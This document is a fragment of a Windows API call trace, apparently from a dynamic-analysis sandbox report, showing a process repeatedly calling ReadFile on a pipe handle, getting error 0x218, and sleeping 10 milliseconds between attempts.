	[0209.337] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.337] GetLastError () returned 0x218
	[0209.337] Sleep (dwMilliseconds=0xa) 
	[0209.353] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.353] GetLastError () returned 0x218
	[0209.353] Sleep (dwMilliseconds=0xa) 
	[0209.369] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.369] GetLastError () returned 0x218
	[0209.369] Sleep (dwMilliseconds=0xa) 
	[0209.384] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.384] GetLastError () returned 0x218
	[0209.384] Sleep (dwMilliseconds=0xa) 
	[0209.400] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.400] GetLastError () returned 0x218
	[0209.400] Sleep (dwMilliseconds=0xa) 
	[0209.427] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.427] GetLastError () returned 0x218
	[0209.427] Sleep (dwMilliseconds=0xa) 
	[0209.431] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.431] GetLastError () returned 0x218
	[0209.431] Sleep (dwMilliseconds=0xa) 
	[0209.478] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.478] GetLastError () returned 0x218
	[0209.478] Sleep (dwMilliseconds=0xa) 
	[0209.524] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.524] GetLastError () returned 0x218
	[0209.524] Sleep (dwMilliseconds=0xa) 
	[0209.540] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.540] GetLastError () returned 0x218
	[0209.540] Sleep (dwMilliseconds=0xa) 
	[0209.555] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.555] GetLastError () returned 0x218
	[0209.555] Sleep (dwMilliseconds=0xa) 
	[0209.572] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.572] GetLastError () returned 0x218
	[0209.572] Sleep (dwMilliseconds=0xa) 
	[0209.587] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.587] GetLastError () returned 0x218
	[0209.588] Sleep (dwMilliseconds=0xa) 
	[0209.602] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.602] GetLastError () returned 0x218
	[0209.603] Sleep (dwMilliseconds=0xa) 
	[0209.639] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.639] GetLastError () returned 0x218
	[0209.639] Sleep (dwMilliseconds=0xa) 
	[0209.680] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.680] GetLastError () returned 0x218
	[0209.680] Sleep (dwMilliseconds=0xa) 
	[0209.719] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.719] GetLastError () returned 0x218
	[0209.719] Sleep (dwMilliseconds=0xa) 
	[0209.747] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.747] GetLastError () returned 0x218
	[0209.748] Sleep (dwMilliseconds=0xa) 
	[0209.758] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.758] GetLastError () returned 0x218
	[0209.758] Sleep (dwMilliseconds=0xa) 
	[0209.774] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.774] GetLastError () returned 0x218
	[0209.774] Sleep (dwMilliseconds=0xa) 
	[0209.790] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.790] GetLastError () returned 0x218
	[0209.790] Sleep (dwMilliseconds=0xa) 
	[0209.806] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.806] GetLastError () returned 0x218
	[0209.806] Sleep (dwMilliseconds=0xa) 
	[0209.821] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.821] GetLastError () returned 0x218
	[0209.821] Sleep (dwMilliseconds=0xa) 
	[0209.837] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.837] GetLastError () returned 0x218
	[0209.837] Sleep (dwMilliseconds=0xa) 
	[0209.852] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.852] GetLastError () returned 0x218
	[0209.852] Sleep (dwMilliseconds=0xa) 
	[0209.899] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.899] GetLastError () returned 0x218
	[0209.899] Sleep (dwMilliseconds=0xa) 
	[0209.945] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.945] GetLastError () returned 0x218
	[0209.946] Sleep (dwMilliseconds=0xa) 
	[0209.976] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.976] GetLastError () returned 0x218
	[0209.976] Sleep (dwMilliseconds=0xa) 
	[0209.976] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.976] GetLastError () returned 0x218
	[0209.977] Sleep (dwMilliseconds=0xa) 
	[0209.992] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.992] GetLastError () returned 0x218
	[0209.992] Sleep (dwMilliseconds=0xa) 
	[0210.008] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.008] GetLastError () returned 0x218
	[0210.008] Sleep (dwMilliseconds=0xa) 
	[0210.024] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.024] GetLastError () returned 0x218
	[0210.024] Sleep (dwMilliseconds=0xa) 
	[0210.043] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.043] GetLastError () returned 0x218
	[0210.044] Sleep (dwMilliseconds=0xa) 
	[0210.055] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.055] GetLastError () returned 0x218
	[0210.055] Sleep (dwMilliseconds=0xa) 
	[0210.071] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.071] GetLastError () returned 0x218
	[0210.071] Sleep (dwMilliseconds=0xa) 
	[0210.104] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.104] GetLastError () returned 0x218
	[0210.104] Sleep (dwMilliseconds=0xa) 
	[0210.148] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.148] GetLastError () returned 0x218
	[0210.148] Sleep (dwMilliseconds=0xa) 
	[0210.185] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.185] GetLastError () returned 0x218
	[0210.185] Sleep (dwMilliseconds=0xa) 
	[0210.195] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.195] GetLastError () returned 0x218
	[0210.195] Sleep (dwMilliseconds=0xa) 
	[0210.211] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.211] GetLastError () returned 0x218
	[0210.211] Sleep (dwMilliseconds=0xa) 
	[0210.227] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.227] GetLastError () returned 0x218
	[0210.227] Sleep (dwMilliseconds=0xa) 
	[0210.242] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.242] GetLastError () returned 0x218
	[0210.242] Sleep (dwMilliseconds=0xa) 
	[0210.258] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.258] GetLastError () returned 0x218
	[0210.258] Sleep (dwMilliseconds=0xa) 
	[0210.274] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.274] GetLastError () returned 0x218
	[0210.274] Sleep (dwMilliseconds=0xa) 
	[0210.289] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.289] GetLastError () returned 0x218
	[0210.289] Sleep (dwMilliseconds=0xa) 
	[0210.335] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.335] GetLastError () returned 0x218
	[0210.335] Sleep (dwMilliseconds=0xa) 
	[0210.382] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.382] GetLastError () returned 0x218
	[0210.382] Sleep (dwMilliseconds=0xa) 
	[0210.407] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.407] GetLastError () returned 0x218
	[0210.407] Sleep (dwMilliseconds=0xa) 
	[0210.413] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.413] GetLastError () returned 0x218
	[0210.413] Sleep (dwMilliseconds=0xa) 
	[0210.436] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.436] GetLastError () returned 0x218
	[0210.436] Sleep (dwMilliseconds=0xa) 
	[0210.445] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.445] GetLastError () returned 0x218
	[0210.445] Sleep (dwMilliseconds=0xa) 
	[0210.461] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.461] GetLastError () returned 0x218
	[0210.461] Sleep (dwMilliseconds=0xa) 
	[0210.476] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.476] GetLastError () returned 0x218
	[0210.476] Sleep (dwMilliseconds=0xa) 
	[0210.492] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.492] GetLastError () returned 0x218
	[0210.492] Sleep (dwMilliseconds=0xa) 
	[0210.538] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.538] GetLastError () returned 0x218
	[0210.538] Sleep (dwMilliseconds=0xa) 
	[0210.585] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.585] GetLastError () returned 0x218
	[0210.585] Sleep (dwMilliseconds=0xa) 
	[0210.646] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.646] GetLastError () returned 0x218
	[0210.646] Sleep (dwMilliseconds=0xa) 
	[0210.647] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.647] GetLastError () returned 0x218
	[0210.647] Sleep (dwMilliseconds=0xa) 
	[0210.663] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.663] GetLastError () returned 0x218
	[0210.663] Sleep (dwMilliseconds=0xa) 
	[0210.679] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.679] GetLastError () returned 0x218
	[0210.679] Sleep (dwMilliseconds=0xa) 
	[0210.695] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.695] GetLastError () returned 0x218
	[0210.695] Sleep (dwMilliseconds=0xa) 
	[0210.741] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.741] GetLastError () returned 0x218
	[0210.741] Sleep (dwMilliseconds=0xa) 
	[0210.788] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.788] GetLastError () returned 0x218
	[0210.788] Sleep (dwMilliseconds=0xa) 
	[0210.804] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.804] GetLastError () returned 0x218
	[0210.804] Sleep (dwMilliseconds=0xa) 
	[0210.822] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.822] GetLastError () returned 0x218
	[0210.822] Sleep (dwMilliseconds=0xa) 
	[0210.835] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.835] GetLastError () returned 0x218
	[0210.835] Sleep (dwMilliseconds=0xa) 
	[0210.851] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.851] GetLastError () returned 0x218
	[0210.851] Sleep (dwMilliseconds=0xa) 
	[0210.871] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.872] GetLastError () returned 0x218
	[0210.872] Sleep (dwMilliseconds=0xa) 
	[0210.882] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.882] GetLastError () returned 0x218
	[0210.882] Sleep (dwMilliseconds=0xa) 
	[0210.898] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.898] GetLastError () returned 0x218
	[0210.898] Sleep (dwMilliseconds=0xa) 
	[0210.913] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.913] GetLastError () returned 0x218
	[0210.913] Sleep (dwMilliseconds=0xa) 
	[0210.959] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0210.959] GetLastError () returned 0x218
	[0210.959] Sleep (dwMilliseconds=0xa) 
	[0211.006] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.006] GetLastError () returned 0x218
	[0211.006] Sleep (dwMilliseconds=0xa) 
	[0211.030] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.030] GetLastError () returned 0x218
	[0211.030] Sleep (dwMilliseconds=0xa) 
	[0211.037] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.037] GetLastError () returned 0x218
	[0211.037] Sleep (dwMilliseconds=0xa) 
	[0211.053] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.053] GetLastError () returned 0x218
	[0211.053] Sleep (dwMilliseconds=0xa) 
